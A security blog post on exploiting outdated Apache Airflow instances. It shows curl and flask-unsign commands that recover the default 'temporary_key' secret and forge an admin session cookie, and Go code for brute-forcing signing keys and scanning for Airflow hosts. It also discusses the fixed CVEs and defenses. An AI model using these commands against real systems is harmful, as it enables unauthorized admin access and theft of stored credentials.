Apache Airflow is a popular system for executing workflows, such as copying and transforming data between data sources. I first ran into an Airflow instance exposed to the internet on a bug bounty program during recon, and started investigating its security.

By its nature, Airflow is designed to be connected to many internal systems, and it comes with a web-based interface to introspect it. Pairing a web attack surface with connections to databases and other critical systems makes it an attractive target.

I'll talk about the public CVE I started with, how I automated it to find several critical issues in a bunch of bug bounty programs, and then some lower-severity CVEs I subsequently discovered in Airflow.

All of the issues I'll talk about have been fixed in the latest Airflow versions, but it is hard to overstate how many of the ways to deploy Airflow will still install an outdated version! If your company runs Airflow internally, you should ensure you are on at least v1.10.15 or v2.0.2.
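
The version thresholds above can be checked mechanically. This is a minimal sketch, assuming plain MAJOR.MINOR.PATCH version strings; the function names are hypothetical, and suffixed versions (release candidates, vendor builds) are rejected rather than guessed at.

```go
package main

import (
	"fmt"
	"strconv"
	"strings"
)

// parseVersion turns "1.10.15" (or "v1.10.15") into [1 10 15].
// Anything that is not exactly three numeric components is an error.
func parseVersion(v string) ([3]int, error) {
	var out [3]int
	parts := strings.Split(strings.TrimPrefix(strings.TrimSpace(v), "v"), ".")
	if len(parts) != 3 {
		return out, fmt.Errorf("expected MAJOR.MINOR.PATCH, got %q", v)
	}
	for i, p := range parts {
		n, err := strconv.Atoi(p)
		if err != nil {
			return out, fmt.Errorf("bad component %q in %q", p, v)
		}
		out[i] = n
	}
	return out, nil
}

// atLeast reports whether a >= b, comparing component by component.
func atLeast(a, b [3]int) bool {
	for i := 0; i < 3; i++ {
		if a[i] != b[i] {
			return a[i] > b[i]
		}
	}
	return true
}

// isPatched applies the thresholds from this post: 1.10.15 for the v1 line
// and 2.0.2 for v2 and later.
func isPatched(version string) (bool, error) {
	v, err := parseVersion(version)
	if err != nil {
		return false, err
	}
	if v[0] < 2 {
		return atLeast(v, [3]int{1, 10, 15}), nil
	}
	return atLeast(v, [3]int{2, 0, 2}), nil
}

func main() {
	for _, v := range []string{"1.10.12", "1.10.15", "2.0.0", "2.0.2"} {
		ok, err := isPatched(v)
		fmt.Println(v, ok, err)
	}
}
```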

CVE-2020-17526

Stateless authentication and authorization with JWTs and other "tokens" has been the biggest boon to security researchers in quite a while. These schemes are hard to implement securely, and they are prone to several vulnerabilities that are both easy to find and critical in impact (weak signing keys, several types of algorithm confusion, etc.).

In this case, Airflow's web interface uses Flask's stateless, signed cookies to store authentication data. This means that Airflow relies on the user_id attribute in the session cookie to determine whether you are logged in, and as whom. Normally, we cannot modify these attributes because the cookie is signed: changing the contents invalidates the signature, unless we have the key!
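
Signed does not mean encrypted: anyone holding the cookie can read it. The sketch below decodes the payload part of a Flask-style session cookie, assuming the layout I understand Flask's default session interface to use (unpadded URL-safe base64, dot-separated, with a leading dot marking a zlib-compressed payload). The function names and the demo cookie are hypothetical, and the timestamp and signature parts are placeholders.

```go
package main

import (
	"bytes"
	"compress/zlib"
	"encoding/base64"
	"errors"
	"fmt"
	"io"
	"strings"
)

// decodeSessionPayload returns the JSON stored in the first part of a
// "payload.timestamp.signature" cookie. It does not check the signature.
func decodeSessionPayload(cookie string) (string, error) {
	// Assumption: a leading "." means the payload was zlib-compressed.
	compressed := strings.HasPrefix(cookie, ".")
	cookie = strings.TrimPrefix(cookie, ".")

	payload, _, found := strings.Cut(cookie, ".") // requires Go 1.18+
	if !found {
		return "", errors.New("not a signed cookie: no separator found")
	}
	raw, err := base64.RawURLEncoding.DecodeString(payload)
	if err != nil {
		return "", fmt.Errorf("payload is not unpadded URL-safe base64: %w", err)
	}
	if !compressed {
		return string(raw), nil
	}
	zr, err := zlib.NewReader(bytes.NewReader(raw))
	if err != nil {
		return "", err
	}
	defer zr.Close()
	out, err := io.ReadAll(zr)
	if err != nil {
		return "", err
	}
	return string(out), nil
}

// demoCookie builds a cookie-shaped string with placeholder timestamp and
// signature parts, only so the decoder has something to work on.
func demoCookie(jsonBody string, compress bool) string {
	data := []byte(jsonBody)
	prefix := ""
	if compress {
		var buf bytes.Buffer
		zw := zlib.NewWriter(&buf)
		zw.Write(data)
		zw.Close()
		data = buf.Bytes()
		prefix = "."
	}
	return prefix + base64.RawURLEncoding.EncodeToString(data) + ".TIMESTAMP.SIGNATURE"
}

func main() {
	cookie := demoCookie(`{"_fresh":true,"user_id":"1"}`, true)
	decoded, err := decodeSessionPayload(cookie)
	fmt.Println(decoded, err)
}
```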

Junghan Lee of Deliveryhero Korea discovered that Airflow shipped with a default signing key of temporary_key, and nothing seemed to change it by default. Using the great flask-unsign tool, we can very easily browse to an Airflow instance's login page, capture the unauthenticated cookie, and test whether it is vulnerable:

% curl -sI "http://randomairflowinstance.com/login" | grep -i cookie
set-cookie: session=<cookie>

% flask-unsign -u -c "<cookie>"
[*] Session decodes to: {'_fresh': True, '_id': '<id>', 'csrf_token': '<csrf>'}
[*] No wordlist selected, falling back to default wordlist..
[*] Starting brute-forcer with 8 threads..
[+] Found secret key after 41670 attempts
'temporary_key'
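
What the brute-forcer does for each candidate key can be sketched in a few lines. This is not flask-unsign's code; it is a minimal sketch that assumes the signing scheme I understand Flask's default sessions to use via itsdangerous: HMAC-SHA1 over everything before the last dot, with the key derived as HMAC-SHA1(secret, "cookie-session"). All function names are hypothetical, and the cookie in the demo is a placeholder signed locally.

```go
package main

import (
	"crypto/hmac"
	"crypto/sha1"
	"encoding/base64"
	"fmt"
	"strings"
)

// flaskSalt is the salt assumed for Flask's default session cookies.
const flaskSalt = "cookie-session"

// signature derives a key from the secret and salt, then MACs the value.
func signature(secret, value string) []byte {
	derive := hmac.New(sha1.New, []byte(secret))
	derive.Write([]byte(flaskSalt))
	mac := hmac.New(sha1.New, derive.Sum(nil))
	mac.Write([]byte(value))
	return mac.Sum(nil)
}

// signedWith reports whether the cookie's trailing signature verifies under
// the given secret. The signed value is everything before the last dot.
func signedWith(cookie, secret string) bool {
	i := strings.LastIndex(cookie, ".")
	if i < 0 {
		return false
	}
	got, err := base64.RawURLEncoding.DecodeString(cookie[i+1:])
	if err != nil {
		return false
	}
	return hmac.Equal(got, signature(secret, cookie[:i]))
}

// findKey tries each candidate and returns the first one that verifies.
func findKey(cookie string, candidates []string) (string, bool) {
	for _, c := range candidates {
		if signedWith(cookie, c) {
			return c, true
		}
	}
	return "", false
}

// sign appends a signature to value; it exists so the demo has a cookie to
// test against without touching a real server.
func sign(value, secret string) string {
	return value + "." + base64.RawURLEncoding.EncodeToString(signature(secret, value))
}

func main() {
	cookie := sign("PAYLOAD.TIMESTAMP", "temporary_key")
	key, ok := findKey(cookie, []string{"secret", "changeme", "temporary_key"})
	fmt.Println(key, ok)
}
```

Each attempt costs two HMAC computations, which is why a wordlist of tens of thousands of keys finishes almost instantly for one cookie but adds up across a large crawl.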

It's then trivial to take that same cookie and forge the user_id attribute, which designates the user ID you want to log in as. Since the cookies are stateless, the Airflow instance has no way of knowing we modified this attribute. In this example we'll try an ID of 1, which is typically an admin:

% flask-unsign -s --secret "temporary_key" -c "{'_fresh': True, '_id': '<id>', 'csrf_token': '<csrf>', 'user_id': '1'}"
<an admin cookie!>

# ...go set that value as your session cookie and you'll be logged in! Note that the cookie expires.

The Airflow admin UI, showing variables with sensitive keys in plaintext(!)

Once you are logged in, Airflow's web UI exposes a lot of sensitive data, which often makes this an extremely critical issue.

You can view environment variables and their contents. Commonly, there are highly-permissioned keys for AWS, payment processors, databases, etc. While these can be hidden from the web UI, many companies neglect to enable this. If you use Airflow internally, check this!

You may be able to execute "ad-hoc queries" against connected data sources, even if you cannot read their credentials directly. SQLi as a service!

You can view the logs and source code of workflows (called "DAGs"), which may also contain credentials.

Automating discovery

I initially exploited this CVE on a transportation company's bug bounty, and I was quickly awarded $4,500 for it as a critical issue. That is pretty good for a public CVE, and I was sure there were other instances, so I decided to wire this bug into my bug bounty automation framework. Bug bounties are fun, but they carry significant risk of not being paid for your time. As a result, many researchers automate detecting vulnerabilities across all assets of every bug bounty program, and this trend is increasing rapidly.

While my framework for this isn't open-source at the moment, the workflow for doing this is straightforward on paper: discover (sub)domains of companies with bug bounties, find open ports on those hosts, and then send HTTP requests to them and see what happens. There is a lot of depth to each of these tasks, but you could start with a framework like Amass. My tooling currently tracks over 400,000 exposed ports across 1.1 million discovered domains.

To detect this issue, I defined a simple request for GET /api/v1/version. With Airflow v1, this throws a distinctive 404 page that we can flag as worthy of investigation (since most of these instances aren't updated). On Airflow v2, this will return the system's version if the new API is misconfigured to not require authentication. When either of these rules matches a host, I get a push notification on my phone, can quickly identify the host and IP address, and can investigate whether it merits a report.

&(ProcessorRequest{Path: "/api/v1/version"}): {
	{
		Handler:  processorAirflowStableApi, // Returns a Result if it looks like the Airflow v2 API.
		Name:     "airflow_stable",
		Interval: 10,
	},
	{
		Handler:  processorCheckAirflow404, // Returns a Result if it looks like the Airflow 404 page.
		Name:     "airflow_404",
		Interval: 10,
	},
},

[...]

func processorCheckAirflow404(res *Response, domain queries.PortVHost) (*models.Result, error) {
	// Ignore if it's not a 404 or if the body is empty.
	if res.Http.StatusCode != 404 || res.Body == "" {
		return nil, nil
	}

	// Ignore if it doesn't contain the distinctive 404 page.
	if !strings.Contains(res.Body, "Airflow 404 = lots of circles") {
		return nil, nil
	}

	[...]
}
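
The framework types above are not public, so here is a standalone sketch of both checks as one function over a status code and body. The v2 branch is an assumption about how processorAirflowStableApi might work: it treats a 200 response whose JSON body has a non-empty "version" field as a hit, which is a loose heuristic that other APIs at the same path could also satisfy. The finding type and classify function are hypothetical names.

```go
package main

import (
	"encoding/json"
	"fmt"
	"strings"
)

// finding names the rule that matched, reusing the rule names from the post.
type finding string

const (
	none          finding = ""
	airflow404    finding = "airflow_404"
	airflowStable finding = "airflow_stable"
)

// versionInfo holds the one field this sketch assumes the v2 endpoint returns.
type versionInfo struct {
	Version string `json:"version"`
}

// classify inspects a response to GET /api/v1/version and returns which rule
// matched, plus the reported version when there is one.
func classify(status int, body string) (finding, string) {
	switch {
	case status == 404 && strings.Contains(body, "Airflow 404 = lots of circles"):
		// The distinctive Airflow v1 404 page.
		return airflow404, ""
	case status == 200:
		// An unauthenticated v2 API answers with JSON that includes a version.
		var v versionInfo
		if err := json.Unmarshal([]byte(body), &v); err == nil && v.Version != "" {
			return airflowStable, v.Version
		}
	}
	return none, ""
}

func main() {
	f, v := classify(200, `{"version":"2.0.0","git_version":null}`)
	fmt.Println(f, v)
	f, v = classify(404, "<title>Airflow 404 = lots of circles</title>")
	fmt.Println(f, v)
}
```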

I used to run flask-unsign on all cookies that looked like they could be vulnerable, but at my request rate it quickly consumed more CPU than the crawler could spare, so I had to move it out into an asynchronous task. I now store all response cookies in MariaDB and later process them at random, but the Airflow 404 page catches more of these instances than this slower process does.
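
The decoupling idea can be shown in memory. This sketch swaps the MariaDB table for a bounded channel and a small worker pool, so it is an analogy rather than the setup described above; cookieQueue and its methods are hypothetical names, and the check function stands in for the expensive key test.

```go
package main

import (
	"fmt"
	"sync"
)

// cookieQueue lets a crawler hand off cookies without waiting for the
// CPU-heavy check to finish.
type cookieQueue struct {
	jobs chan string
	wg   sync.WaitGroup
	mu   sync.Mutex
	hits []string
}

// newCookieQueue starts the given number of workers, each running check on
// queued cookies and recording the ones that return true.
func newCookieQueue(workers, capacity int, check func(string) bool) *cookieQueue {
	q := &cookieQueue{jobs: make(chan string, capacity)}
	for i := 0; i < workers; i++ {
		q.wg.Add(1)
		go func() {
			defer q.wg.Done()
			for c := range q.jobs {
				if check(c) {
					q.mu.Lock()
					q.hits = append(q.hits, c)
					q.mu.Unlock()
				}
			}
		}()
	}
	return q
}

// offer enqueues a cookie without blocking. It returns false when the queue
// is full, so the crawler keeps its pace and the cookie is simply skipped.
func (q *cookieQueue) offer(cookie string) bool {
	select {
	case q.jobs <- cookie:
		return true
	default:
		return false
	}
}

// drain closes the queue, waits for the workers, and returns the hits.
// offer must not be called after drain.
func (q *cookieQueue) drain() []string {
	close(q.jobs)
	q.wg.Wait()
	return q.hits
}

func main() {
	// Stand-in check: a real one would test the cookie against a wordlist.
	q := newCookieQueue(2, 100, func(c string) bool { return c == "weak-cookie" })
	for _, c := range []string{"cookie-a", "weak-cookie", "cookie-b"} {
		q.offer(c)
	}
	fmt.Println(q.drain())
}
```

Dropping work when the queue is full is a deliberate choice here: the crawler never stalls, at the cost of missing some cookies, which mirrors the trade-off of sampling stored cookies at random.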

If you use Project Discovery's vulnerability scanner Nuclei, they have also recently written several great rules for detecting Airflow and its various issues (albeit not this one specifically). They include several other Airflow vulnerabilities that I also wrote rules for.

In total, across HackerOne and Bugcrowd, I made over $13,000 from exploiting these Airflow instances. Most companies handled this issue extremely quickly, although several still expose these instances to the internet, meaning you too could find a different vulnerability and earn another P1 bounty.

Smarter companies quickly placed Airflow behind proxies such as oauth2-proxy or Duo Network Gateway, which is a strong defense against authentication issues at the application level. I highly discourage exposing Airflow directly to the internet.

Further research

At this point, I was pretty interested in Airflow. I decided to set up my own local environment and hunt for additional issues. I started with a popular Docker image for Airflow, but I was dismayed to discover that it does not even support running an Airflow version unaffected by the public CVEs. Eventually, via source code auditing and poking at my now-very vulnerable Linode, I discovered two more lower-impact CVEs:

CVE-2021-26559 (medium severity): In Airflow v2.0.0, a new API was exposed that allows retrieving Airflow's configuration file. There is no RBAC enforced on this endpoint, which allows any authenticated user to retrieve the signing key we abused above, even when it's been changed, allowing privilege escalation to an administrator.

This is not very severe, unless you run one of the Airflow instances out there that implements Google OAuth incorrectly... I have discovered instances that allow signing in with any Google account, which might not get you very far if RBAC is enabled. This CVE would allow properly escalating that issue to an administrator.

CVE-2021-26697 (low severity): In Airflow v1, an API endpoint for the experimental API inadvertently had its authentication decorator removed in a refactor. This is a good advertisement for requiring a decorator to remove authentication, not to add it. This endpoint has several complex parameters and is not very useful, so it is unlikely it was exploited.
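
The "opt out, not opt in" idea can be illustrated outside of Airflow. This is a minimal sketch, not Airflow's code: a hypothetical router where every route is authenticated unless it is registered through an explicit public method, so a refactor that drops a wrapper cannot silently expose an endpoint. The paths and the bearer token are made up for the demo.

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
)

// router authenticates every route by default.
type router struct {
	mux    *http.ServeMux
	authed func(*http.Request) bool
}

func newRouter(authed func(*http.Request) bool) *router {
	return &router{mux: http.NewServeMux(), authed: authed}
}

// handle registers a protected route. There is nothing to forget here:
// the authentication check is part of registration itself.
func (r *router) handle(path string, h http.HandlerFunc) {
	r.mux.HandleFunc(path, func(w http.ResponseWriter, req *http.Request) {
		if !r.authed(req) {
			http.Error(w, "unauthorized", http.StatusUnauthorized)
			return
		}
		h(w, req)
	})
}

// public is the explicit, easy-to-grep way to remove authentication.
func (r *router) public(path string, h http.HandlerFunc) {
	r.mux.HandleFunc(path, h)
}

func (r *router) ServeHTTP(w http.ResponseWriter, req *http.Request) {
	r.mux.ServeHTTP(w, req)
}

// demoRouter wires up one public and one protected route for the demo.
func demoRouter() *router {
	r := newRouter(func(req *http.Request) bool {
		return req.Header.Get("Authorization") == "Bearer demo-token"
	})
	ok := func(w http.ResponseWriter, _ *http.Request) { fmt.Fprint(w, "ok") }
	r.public("/health", ok)
	r.handle("/dags", ok)
	return r
}

// status issues an in-memory GET and returns the response status code.
func status(h http.Handler, path, token string) int {
	req := httptest.NewRequest(http.MethodGet, path, nil)
	if token != "" {
		req.Header.Set("Authorization", "Bearer "+token)
	}
	rec := httptest.NewRecorder()
	h.ServeHTTP(rec, req)
	return rec.Code
}

func main() {
	r := demoRouter()
	fmt.Println(status(r, "/health", ""))
	fmt.Println(status(r, "/dags", ""))
	fmt.Println(status(r, "/dags", "demo-token"))
}
```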

The Apache security team was very responsive and helped fix these issues quickly.

Conclusion

I hope this post encourages more research into Airflow security, as I think it would be valuable for the project and the internet. If you have any questions on Airflow or my automation, feel free to DM me on Twitter at @iangcarroll!

Exploiting outdated Apache Airflow instances in bug bounties
